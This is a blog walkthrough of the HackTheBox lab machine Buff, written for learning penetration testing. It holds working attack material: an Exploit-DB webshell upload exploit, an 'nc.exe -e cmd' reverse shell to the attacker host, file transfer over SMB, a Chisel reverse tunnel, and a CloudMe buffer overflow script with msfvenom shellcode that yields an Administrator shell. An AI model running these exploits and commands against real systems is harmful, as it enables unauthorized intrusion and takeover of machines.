This post is about the Walkthrough of the hackthebox machine: Buff
Hackthebox Buff Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
# Nmap 7.91 scan initiated Tue Feb 22 20:35:04 2022 as: nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.068s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
7680/tcp open pando-pub
8080/tcp open http-proxy
# Nmap done at Tue Feb 22 20:35:23 2022 -- 1 IP address (1 host up) scanned in 19.00 seconds
Seems like fitnessclub website
Directory Enumeration Link to heading
gobuster dir -u http://10.10.10.198:8080 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.198:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/22 20:52:06 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 1044]
/.htaccess (Status: 403) [Size: 1044]
/.hta (Status: 403) [Size: 1044]
/admin.pl (Status: 403) [Size: 1044]
/admin.cgi (Status: 403) [Size: 1044]
/AT-admin.cgi (Status: 403) [Size: 1044]
/aux (Status: 403) [Size: 1044]
/boot (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/boot/]
/cachemgr.cgi (Status: 403) [Size: 1044]
/cgi-bin/ (Status: 403) [Size: 1058]
/com3 (Status: 403) [Size: 1044]
/com1 (Status: 403) [Size: 1044]
/com2 (Status: 403) [Size: 1044]
/con (Status: 403) [Size: 1044]
/ex (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/ex/]
/examples (Status: 503) [Size: 1058]
/img (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/include (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]
/index.php (Status: 200) [Size: 4969]
/LICENSE (Status: 200) [Size: 18025]
/license (Status: 200) [Size: 18025]
/licenses (Status: 403) [Size: 1203]
/lpt2 (Status: 403) [Size: 1044]
/lpt1 (Status: 403) [Size: 1044]
/nul (Status: 403) [Size: 1044]
/phpmyadmin (Status: 403) [Size: 1203]
/prn (Status: 403) [Size: 1044]
/profile (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]
/server-status (Status: 403) [Size: 1203]
/server-info (Status: 403) [Size: 1203]
/upload (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/webalizer (Status: 403) [Size: 1044]
It’s gym management software
Lets search for exploit on this software.
We got the reverse shell using the exploit
─$ python2 48506.py http://10.10.10.198:8080 1 ⨯
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
Traceback (most recent call last):
File "48506.py", line 102, in <module>
r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 578, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 516, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 459, in prepare_request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 314, in prepare
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 382, in prepare_url
requests.exceptions.InvalidURL: Failed to parse: http://10.10.10.198:8080upload.php?id=kamehameha
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ python2 48506.py http://10.10.10.198:8080/ 1 ⨯
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
▒
buff\shaun
The shell is not a normal reverse shell. It quite annoying after some time. Everytime a command is types it starts with a magic work PNG.
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 14:05:58
System Boot Time: 23/02/2022, 01:12:36
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,464 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,690 MB
Virtual Memory: In Use: 2,109 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::cc01:2a17:73b0:b5d0
[03]: dead:beef::95d1:120d:7d7a:6105
[04]: dead:beef::cc01:2a17:73b0:b5d0
[05]: dead:beef::241
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Lets upgrade to normal shell.
locate nc.exe 1 ⨯
/home/rocky/hckbox/Bastard/nc.exe
/home/rocky/hckbox/irked/nc.exe
/home/rocky/hckbox/optimum/nc.exe
/home/rocky/thm/Corp/nc.exe
/home/rocky/thm/alfred/nc.exe
/home/rocky/tool/exp/nc.exe
/home/rocky/tool/exp/enum/Windows/nc.exe
/home/rocky/tool/exp/windows/nc.exe
/home/rocky/wordlist/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/SecLists-master/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ ls
48506.py alltcp.txt alludp.txt detailed.txt nc.exe systeminfo-buff.txt
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ impacket-smbserver smb .
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
On Windows machine lets try to download this.
C:\xampp\htdocs\gym\upload> net use \\10.10.14.12\smb
�PNG
▒
C:\xampp\htdocs\gym\upload> copy \\10.10.14.12\smb\nc.exe nc.exe
�PNG
▒
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
We need some modification on our SMBSERVER comamnds. We re issue commands at Kali Machine
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ impacket-smbserver smb . -smb2support -username df -password df 130 ⨯
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Commds at Windows ( victim)machine
C:\xampp\htdocs\gym\upload> net use \\10.10.14.12\smb /u:df df
�PNG
▒
The command completed successfully.
C:\xampp\htdocs\gym\upload> copy \\10.10.14.12\smb\nc.exe nc.exe
�PNG
▒
1 file(s) copied.
C:\xampp\htdocs\gym\upload> nc.exe -e cmd 10.10.14.12 8989
At Kali Machine:
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.198] 49992
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
whoami
buff\shaun
C:\xampp\htdocs\gym\upload>
Before Applying any escalation scripts, I have checked the user priveleges and could not find anything intresting. I can see some locally opened ports.
netstat -ano | findstr TCP | findstr ":0"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 936
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5948
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1616
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6104
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1588
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2164
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 680
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8112
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5064
TCP [::]:135 [::]:0 LISTENING 936
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 1616
TCP [::]:8080 [::]:0 LISTENING 6104
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 1092
TCP [::]:49666 [::]:0 LISTENING 1588
TCP [::]:49667 [::]:0 LISTENING 2164
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 680
c:\Users\shaun\temp>
I have used “tasklist /v | findstr 5064” 5066 was the process id shown above. You have to be fast as the process id chnages quickly. I could see a exe file below running this program.
Directory of c:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
Port Forwarding Link to heading
Cloudme is a service which can be exploited. If you search you can see some exploits on this service.
searchsploit cloudme
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
However to use this the service should be accesible from outside. In this case this service (cloudme)is running locally and to make this exploitable we should use portforwarding. The tool I am using is “[chisel](GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP)” The versions can be downloaded from here.
Download both windows and Linux versions
ls -al
total 23732
drwxr-xr-x 2 rocky rocky 4096 Feb 23 01:20 .
drwxr-xr-x 21 rocky rocky 4096 Feb 23 01:16 ..
-rw-r--r-- 1 rocky rocky 8077312 Jan 30 21:36 chisel_1.7.7_linux_amd64
-rw-r--r-- 1 rocky rocky 8230912 Jan 30 21:36 chisel_1.7.7_windows_amd64
-rw-r--r-- 1 rocky rocky 7981056 Jan 30 21:36 chisel_1.7.7_windows_arm64
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ impacket-smbserver smb . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
Directory of c:\Users\shaun\temp
23/02/2022 05:21 <DIR> .
23/02/2022 05:21 <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 9,817,460,736 bytes free
net use \\10.10.14.12\smb /u:df df
net use \\10.10.14.12\smb /u:df df
The command completed successfully.
copy \\10.10.14.12\smb\chisel_1.7.7_windows_amd64 exp.exe
copy \\10.10.14.12\smb\chisel_1.7.7_windows_amd64 exp.exe
1 file(s) copied.
dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of c:\Users\shaun\temp
23/02/2022 06:23 <DIR> .
23/02/2022 06:23 <DIR> ..
31/01/2022 02:36 8,230,912 exp.exe
1 File(s) 8,230,912 bytes
2 Dir(s) 9,809,203,200 bytes free
net use /d \\10.10.14.12\smb
net use /d \\10.10.14.12\smb
\\10.10.14.12\smb was deleted successfully.
On Kali linux end lets run this as server mode:
(rocky㉿kali)-[~/tool/exp/chisel]
└─$ sudo ./chisel_1.7.7_linux_amd64 -h 2 ⨯
Usage: chisel [command] [--help]
Version: 1.7.7 (go1.17.6)
Commands:
server - runs chisel in server mode
client - runs chisel in client mode
Read more:
https://github.com/jpillora/chisel
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
At Windows end lets run this as client mode
Directory of c:\Users\shaun\temp
23/02/2022 06:23 <DIR> .
23/02/2022 06:23 <DIR> ..
31/01/2022 02:36 8,230,912 exp.exe
1 File(s) 8,230,912 bytes
2 Dir(s) 9,809,203,200 bytes free
net use /d \\10.10.14.12\smb
net use /d \\10.10.14.12\smb
\\10.10.14.12\smb was deleted successfully.
c:\Users\shaun\temp>
.\exp.exe client 10.10.14.12:8000 R:8888:localhost:8888
.\exp.exe client 10.10.14.12:8000 R:8888:localhost:8888
2022/02/23 06:33:48 client: Connecting to ws://10.10.14.12:8000
2022/02/23 06:33:48 client: Connected (Latency 59.6776ms)
Can see the connection confirmation at server end as well:
─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
2022/02/23 01:33:40 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
see the Kali linux listening ports. Its listeing on port 8888
(rocky㉿kali)-[~]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::8000 :::* LISTEN 4274/./chisel_1.7.7
tcp6 0 0 :::8888 :::* LISTEN 4274/./chisel_1.7.7
Now Lets do the exploit found
searchsploit cloudme
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(rocky㉿kali)-[~]
└─$ cd ~/hckbox/buff
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ locate 48389.py
/usr/share/exploitdb/exploits/windows/remote/48389.py
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cp /usr/share/exploitdb/exploits/windows/remote/48389.py .
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
The exploit require some modification and also the payload option shouldbe added
└─$ ls
48389.py 48389.py.old 48506.py alltcp.txt alludp.txt detailed.txt nc.exe systeminfo-buff.txt
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ python 48389.py
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xda\xde\xbe\x92\x89\x16\x17\xd9\x74\x24\xf4\x5b"
payload += b"\x2b\xc9\xb1\x52\x31\x73\x17\x03\x73\x17\x83\x51"
payload += b"\x8d\xf4\xe2\xa9\x66\x7a\x0c\x51\x77\x1b\x84\xb4"
payload += b"\x46\x1b\xf2\xbd\xf9\xab\x70\x93\xf5\x40\xd4\x07"
payload += b"\x8d\x25\xf1\x28\x26\x83\x27\x07\xb7\xb8\x14\x06"
payload += b"\x3b\xc3\x48\xe8\x02\x0c\x9d\xe9\x43\x71\x6c\xbb"
payload += b"\x1c\xfd\xc3\x2b\x28\x4b\xd8\xc0\x62\x5d\x58\x35"
payload += b"\x32\x5c\x49\xe8\x48\x07\x49\x0b\x9c\x33\xc0\x13"
payload += b"\xc1\x7e\x9a\xa8\x31\xf4\x1d\x78\x08\xf5\xb2\x45"
payload += b"\xa4\x04\xca\x82\x03\xf7\xb9\xfa\x77\x8a\xb9\x39"
payload += b"\x05\x50\x4f\xd9\xad\x13\xf7\x05\x4f\xf7\x6e\xce"
payload += b"\x43\xbc\xe5\x88\x47\x43\x29\xa3\x7c\xc8\xcc\x63"
payload += b"\xf5\x8a\xea\xa7\x5d\x48\x92\xfe\x3b\x3f\xab\xe0"
payload += b"\xe3\xe0\x09\x6b\x09\xf4\x23\x36\x46\x39\x0e\xc8"
payload += b"\x96\x55\x19\xbb\xa4\xfa\xb1\x53\x85\x73\x1c\xa4"
payload += b"\xea\xa9\xd8\x3a\x15\x52\x19\x13\xd2\x06\x49\x0b"
payload += b"\xf3\x26\x02\xcb\xfc\xf2\x85\x9b\x52\xad\x65\x4b"
payload += b"\x13\x1d\x0e\x81\x9c\x42\x2e\xaa\x76\xeb\xc5\x51"
payload += b"\x11\x1e\x10\x57\xed\x76\x26\x67\xf8\x35\xaf\x81"
payload += b"\x68\x2a\xe6\x1a\x05\xd3\xa3\xd0\xb4\x1c\x7e\x9d"
payload += b"\xf7\x97\x8d\x62\xb9\x5f\xfb\x70\x2e\x90\xb6\x2a"
payload += b"\xf9\xaf\x6c\x42\x65\x3d\xeb\x92\xe0\x5e\xa4\xc5"
payload += b"\xa5\x91\xbd\x83\x5b\x8b\x17\xb1\xa1\x4d\x5f\x71"
payload += b"\x7e\xae\x5e\x78\xf3\x8a\x44\x6a\xcd\x13\xc1\xde"
payload += b"\x81\x45\x9f\x88\x67\x3c\x51\x62\x3e\x93\x3b\xe2"
payload += b"\xc7\xdf\xfb\x74\xc8\x35\x8a\x98\x79\xe0\xcb\xa7"
payload += b"\xb6\x64\xdc\xd0\xaa\x14\x23\x0b\x6f\x24\x6e\x11"
payload += b"\xc6\xad\x37\xc0\x5a\xb0\xc7\x3f\x98\xcd\x4b\xb5"
payload += b"\x61\x2a\x53\xbc\x64\x76\xd3\x2d\x15\xe7\xb6\x51"
payload += b"\x8a\x08\x93"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
We have a reverse shell now as Administrator.
Take-Away from this Box Link to heading
The crucial part was to identify the softwares/applications running on this machine. For initial shell we have identified as “gym management software” as front end and for the priv-escalation we have identified “Cloudme”. Both these applications have vulnarabilities found in database. Next learning was about upgrading the inital resticted shell using the “nc.exe”. We have learned how to transfer files between Windows and Linux using SMBv2 support. Before applying the priv escalation scripts, the privleges for the existing user and local ports/services running can be checked. In this case, the local services are found to be vulnarable and we use port forwarding so these are accessible from Attcker machine using Chisel.